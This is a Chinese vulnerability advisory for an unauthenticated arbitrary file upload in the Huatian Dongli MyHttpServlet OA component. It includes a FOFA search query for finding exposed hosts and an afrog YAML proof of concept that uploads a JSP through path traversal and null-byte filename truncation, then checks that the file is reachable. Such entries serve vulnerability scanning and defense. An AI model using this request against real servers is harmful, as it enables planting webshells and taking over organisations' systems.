漏洞信息
漏洞名称: 华天动力 MyHttpServlet 任意文件上传
漏洞类型: 文件上传
漏洞等级: 严重
漏洞描述: 华天动力MyHttpServlet是一款用于企业OA系统的服务组件,广泛应用于企业内部办公自动化系统中,负责处理HTTP请求和响应。该组件在处理文件上传功能时存在安全漏洞,攻击者可以通过构造特殊的HTTP请求,实现任意文件上传。
漏洞的技术根源在于MyHttpServlet组件对上传文件的路径和文件名未进行严格的校验和过滤,导致攻击者可以利用路径遍历和文件名截断技术,将恶意文件上传到服务器的任意目录,包括Web根目录。这种漏洞属于文件上传类型,由于缺乏足够的输入验证和安全控制措施,使得攻击者能够绕过正常的文件上传限制。
该漏洞的利用可能导致严重的安全风险,攻击者可以上传WebShell等恶意脚本,进而获取服务器控制权,执行任意代码,访问敏感数据,甚至完全控制受影响的系统。由于漏洞利用不需要任何形式的认证,且可以远程执行,因此其危害性极高,属于严重级别的安全漏洞。企业用户应立即检查并更新受影响的产品版本,或采取其他缓解措施以防止潜在的攻击。
产品厂商: 华天动力
产品名称: MyHttpServlet
搜索语法: body=”/OAapp/WebObjects/OAapp.woa” || body=”/OAapp/htpages/app”
来源: https://github.com/zan8in/afrog/blob/89bfabcff982e1109bcaa6ece0d23f5105497a67/pocs%2Fafrog-pocs%2Fvulnerability%2Fhuatiandongli-myhttpservlet-fileupload.yaml
类型: zan8in/afrog:github commit
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
| id: huatiandongli-myhttpservlet-fileupload
info: name: 华天动力 MyHttpServlet 任意文件上传 author: zan8in severity: critical verified: false description: |- 华天动力 MyHttpServlet 任意文件上传 Fofa: body="/OAapp/WebObjects/OAapp.woa" || body="/OAapp/htpages/app" reference: - https://mp.weixin.qq.com/s?__biz=MzkzNjYwODg3Ng==&mid=2247484255&idx=1&sn=593fb55af1dc091ae6a4e94de018dbc2 tags: huatian,huatiandongli,fileupload created: 2024/01/16
set: rboundary: randomLowercase(8) filename: randomLowercase(6) bodystr: randomLowercase(16) rules: r0: request: method: POST path: /OAapp/MyHttpServlet?username=admin headers: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}} body: "\ ------WebKitFormBoundary{{rboundary}}\r\n\ Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../webapps/ROOT/{{filename}}.jsp%00.jpg\r\n\ \r\n\ {{bodystr}}\r\n\ ------WebKitFormBoundary{{rboundary}}--\r\n\ " expression: response.status == 200 r1: request: method: GET path: /{{filename}}.jsp;.html expression: response.status == 200 && response.body.bcontains(bytes(bodystr)) expression: r0() && r1()
|